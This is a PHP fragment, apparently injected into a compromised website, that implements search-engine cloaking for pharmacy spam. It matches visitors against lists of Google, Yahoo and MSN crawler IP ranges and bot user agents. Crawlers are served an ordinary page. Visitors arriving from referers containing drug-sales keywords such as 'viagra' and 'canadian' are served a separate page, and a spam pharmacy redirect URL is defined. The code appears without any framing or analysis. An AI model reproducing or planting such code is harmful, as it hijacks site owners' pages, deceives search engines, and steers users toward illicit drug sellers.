1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119

?><?php

$host=$_SERVER['HTTP_HOST'];
$agent=$_SERVER['HTTP_USER_AGENT'];

$r=rand(0, 1);
$redic = array("http://www.mycanadianhealthcare.com/item.php?id=188&aid=8596","http://www.mycanadianhealthcare.com/item.php?id=188&aid=8596");

    $server_accept_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
    $server_referer = @$_SERVER['HTTP_REFERER'];
    $server_host = @$_SERVER['HTTP_HOST'];
    $server_forwarded_for = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $server_remote_addr = @$_SERVER['REMOTE_ADDR'];
    $server_query_string = @$_SERVER['QUERY_STRING'];
    $server_signature = @$_SERVER['SERVER_SIGNATURE'];
    $server_request = @$_SERVER['REQUEST_URI'];

function detectBot($server_user_agent,$server_ip,$my_url_for_log,$server_query_string,$server_referer,$enable_logging){
    $stop_ips_masks = array(
        "66\.249\.[6-9][0-9]\.[0-9]+",    // Google    NetRange:   66.249.64.0 - 66.249.95.255
        "74\.125\.[0-9]+\.[0-9]+",        // Google     NetRange:   74.125.0.0 - 74.125.255.255
        "65\.5[2-5]\.[0-9]+\.[0-9]+",    // MSN        NetRange:   65.52.0.0 - 65.55.255.255,
        "74\.6\.[0-9]+\.[0-9]+",        // Yahoo    NetRange:   74.6.0.0 - 74.6.255.255
        "67\.195\.[0-9]+\.[0-9]+",        // Yahoo#2    NetRange:   67.195.0.0 - 67.195.255.255
        "72\.30\.[0-9]+\.[0-9]+",        // Yahoo#3    NetRange:   72.30.0.0 - 72.30.255.255
        "38\.[0-9]+\.[0-9]+\.[0-9]+",     // Cuill:     NetRange:   38.0.0.0 - 38.255.255.255
        "93\.172\.94\.227",                // MacFinder
        "212\.100\.250\.218",            // Wells Search II
        "71\.165\.223\.134",            // Indy Library
        "70\.91\.180\.25",
        "65\.93\.62\.242",
        "74\.193\.246\.129",
        "213\.144\.15\.38",
        "195\.92\.229\.2",
        "70\.50\.189\.191",
        "218\.28\.88\.99",
        "165\.160\.2\.20",
        "89\.122\.224\.230",
        "66\.230\.175\.124",
        "218\.18\.174\.27",
        "65\.33\.87\.94",
        "67\.210\.111\.241",
        "81\.135\.175\.70",
        "64\.69\.34\.134",
        "89\.149\.253\.169",

        "64\.233\.1[6-8][1-9]\.[0-9]+",
        "64\.233\.19[0-1]\.[0-9]+",
        //google from iplists
        "209\.185\.108\.[0-9]+",
        "209\.185\.253\.[0-9]+",
        "209\.85\.238\.[0-9]+",
        "216\.239\.33\.9[6-9]",
        "216\.239\.37\.9[8-9]",
        "216\.239\.39\.9[8-9]",
        "216\.239\.41\.9[6-9]",
        "216\.239\.45\.4",
        "216\.239\.46\.[0-9]+",
        "216\.239\.51\.9[6-9]",
        "216\.239\.53\.9[8-9]",
        "216\.239\.57\.9[6-9]",
        "216\.239\.59\.9[8-9]",
        "216\.33\.229\.163",
        "64\.233\.173\.[0-9]+",
        "64\.68\.8[0-9]\.[0-9]+",
        "64\.68\.9[0-2]\.[0-9]+",
        "72\.14\.199\.[0-9]+",
        "8\.6\.48\.[0-9]+",
        //google from iplists
// 10.0.0.0 - 10.255.255.255 iana
        "207\.211\.40\.82",
        "67\.162\.158\.146",
        "66\.255\.53\.123",
        "24\.200\.208\.112",
        "129\.187\.148\.240",
        "129\.187\.148\.244",
        "199\.126\.151\.229",
        "118\.124\.32\.193",
        "89\.149\.217\.191"

    );
    $stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawl", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress",'Charlotte','wwwster','Python','urllib','perl','libwww','lynx','Twiceler','rambler','yandex');

    $server_user_agent = preg_replace("|User\.Agent\:[\s ]?|i", "", @$server_user_agent);

    $is_human = true; $stop_ip_detected = false; $stop_agent_detected = false; $detected_str = "";
    foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("$stop_ip_mask", $server_ip)) {
        $is_human = false;  break;
    }
    if($is_human) foreach($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$server_user_agent) !== false){
        $is_human = false;  break;
    }
    if($is_human and !eregi("^[a-zA-Z]{5,}", @$server_user_agent)) {
        $is_human = false;
    }

    if($is_human and strlen($server_user_agent)<=11) {
        $is_human = false;
    }

    if(stristr($server_referer,$server_query_string)) {
        $is_human = false;
    }

    return $is_human;
}

@$is_human = @detectBot($server_user_agent,$server_ip,$my_url_for_log,$server_query_string,$server_referer,$enable_logging);
if (@$is_human==false) 
{ 
include "header.php";
exit;
}
if (preg_match('/viagra|cialis|levitra|pharmacy|drugstore|prescription|canadian|canada|approved|drugs|buy|sale|sales|order|discount|Viagra|Cialis/', $_SERVER["HTTP_REFERER"])) { 
include "theme.html";
 exit;  }

?><?